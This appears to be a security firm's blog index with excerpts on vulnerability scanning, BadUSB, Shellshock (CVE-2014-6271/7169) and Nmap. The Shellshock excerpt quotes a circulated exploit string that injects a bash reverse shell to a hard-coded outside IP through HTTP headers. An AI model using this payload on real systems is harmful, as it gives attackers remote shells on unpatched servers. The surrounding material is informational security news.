Why perform Alpha Scans on a regular basis?

People are always asking me: “Why should I have you run an Alpha scan for me?” Because a hacker may have been there already, and not a “good” ethical hacker but the black hat variety. As the Internet Storm Center discusses today (the Infosec community forum post): There are certain ports that should not …

BadUSB is a hack attacking USB controllers everywhere.

What is this BadUSB? Extremetech.com has a story and the YouTube video from Black Hat 2014 (not DerbyCon, as in the article). The controller can be hacked and code inserted inside the USB chips themselves. So we have to create good security policies and reduce the chance of plugging in USB devices that we do not know about. …

Another Hacker shows how to hack Bash Shellcode

Google Web Cache of the exploit: char *request = "GET %s HTTP/1.0\r\nUser-Agent: () { :; }; /bin/bash -i >& /dev/tcp/199.175.52.92/2221 0>&1\r\nCookie: () { :; }; /bin/bash -i >& /dev/tcp/199.175.52.92/2221 0>&1\r\nHost: %s\r\nReferer: () { :; }; /bin/bash -i >& /dev/tcp/199.175.52.92/2221 0>&1\r\n\r\n"; which, as it is explained in the link (by the hacker), is to run a …

RedHat still vulnerable to Bash shellcode

RedHat customer portal: Red Hat has become aware that the patch for CVE-2014-6271 is incomplete. An attacker can provide specially-crafted environment variables containing arbitrary commands that will be executed on vulnerable systems under certain conditions. The new issue has been assigned CVE-2014-7169. This issue (CVE-2014-6271) has not been resolved on RedHat operating systems (i.e. no …

Nmap an excellent tool for scanning

nmap.org has some info, but we also review sites with insight into scanning. Nmap is short for Network Mapper. Ethical hacking – Penetration Testing, by Bhargav Tandel. NixCraft is also a good site about Nmap insights: NixCraft is an online community of new and seasoned Linux / Unix sysadmins who want to make the …